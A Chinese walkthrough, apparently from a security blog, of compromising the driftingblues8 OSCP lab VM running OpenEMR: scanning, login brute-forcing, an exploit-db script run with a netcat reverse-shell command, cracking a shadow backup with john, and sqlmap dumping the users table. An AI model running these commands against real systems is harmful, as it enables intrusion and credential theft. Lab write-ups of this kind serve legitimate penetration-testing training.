OSCP 靶场
靶场介绍
|
driftingblues8 |
easy |
常规渗透手段、sql注入、后台爆破、cms利用拿shell、johnshadow爆破利用 |
信息收集
主机发现
fping -aqg 192.168.1.0/24端口扫描
└─# nmap -sV -A -p- -T4 192.168.1.191
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-26 21:25 EST
Stats: 0:00:00 elapsed; 0 hosts completed (0 up), 0 undergoing Script Pre-Scan
NSE Timing: About 0.00% done
Nmap scan report for 192.168.1.191
Host is up (0.0011s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Debian))
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:2D:64:D7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 1.08 ms 192.168.1.191
目录扫描
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.191 -x php,txt,html
扫描到一个有用的字典文件,接下来的思路就是爆破后台了
爆破到了账号密码,尝试登录成功。
权限获取
根据cms 版本找到了不少漏洞
python2 /usr/share/exploitdb/exploits/php/webapps/45161.py http://192.168.1.191 -u admin -p .:.yarrak.:.31 -c "nc 192.168.1.158 8989 -e /bin/bash"
权限提升
这里使用linpeas 提权脚本找到了如下一些有用的信息,其中有一个shadow备份文件
/var/www/html/sites/default/sqlconf.php
/var/backups/shadow.backup
-rw-r--r-- 1 root root 943 Apr 25 2021 /var/backups/shadow.backup
-rwxrwxrwx 1 www-data www-data 2179 May 28 2018 /var/www/html/interface/main/backuplog.php
-rwxrwxrwx 1 www-data www-data 27999 May 28 2018 /var/www/html/interface/main/backup.php
-rwxrwxrwx 1 www-data www-data 1992 May 28 2018 /var/www/html/interface/main/backuplog.sh
-rwxrwxrwx 1 www-data www-data 1117 May 28 2018 /var/www/html/contrib/util/backup_oemr.sh
-rw-r--r-- 1 root root 303 Oct 26 2018 /usr/share/doc/hdparm/changelog.old.gz
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rw-r--r-- 1 root root 363752 Apr 30 2018 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 348 Nov 25 2020 /usr/share/man/man1/wsrep_sst_mariabackup.1.gz
-rw-r--r-- 1 root root 2754 Jun 21 2019 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 6199 Mar 19 2021 /usr/lib/modules/4.19.0-16-686-pae/kernel/drivers/net/team/team_mode_activebackup.ko
-rwxr-xr-x 1 root root 38412 Nov 25 2020 /usr/bin/wsrep_sst_mariabackup
passwd file: /etc/pam.d/passwd
passwd file: /etc/passwd
passwd file: /usr/share/bash-completion/completions/passwd
passwd file: /usr/share/lintian/overrides/passwd
/var/www/html/vendor/phpseclib/phpseclib/phpseclib/Crypt/RSA.php
/var/www/html/vendor/doctrine/couchdb
shadow 爆破
尝试使用john 进行爆破,成功获取clapton 账号的密码
john -w=/usr/share/wordlists/rockyou.txt shadow --format=crypt
root 提权
这里有个root 权限的文件,还骂人过分了。silly hacker! 但是这个文件并没有什么用。
使用exp 提权失败
clapton@driftingblues:/tmp$ gcc -c exp.c
clapton@driftingblues:/tmp$ gcc -o exp exp.o -lm
clapton@driftingblues:/tmp$ ls
exp exp.c exp.o linpeas.sh
clapton@driftingblues:/tmp$ chmod +x exp
clapton@driftingblues:/tmp$ ./exp
[+] Linux Privilege Escalation by theflow@ - 2021
[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[-] unshare(CLONE_NEWUSER): Operation not permitted到这里才发现clapton用户下的wordlist.txt 和网站目录下载的wordlist.txt 不是同一个。所以还是不够细致啊!
接下来就可以拿这个字典再次爆破了。经过尝试还真的有 root 的账号密码
补充
这里还有另外一个
sqlmap -u 'http://192.168.1.191/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' -p enc -b --random-agent --batch# sqlmap -u 'http://192.168.1.191/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1' -p enc -b --random-agent --batch -D openemr -T users_secure -C username,password --dump
End
“点赞、在看与分享都是莫大的支持”
原文始发于微信公众号(贝雷帽SEC):【OSCP】driftingblues8
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论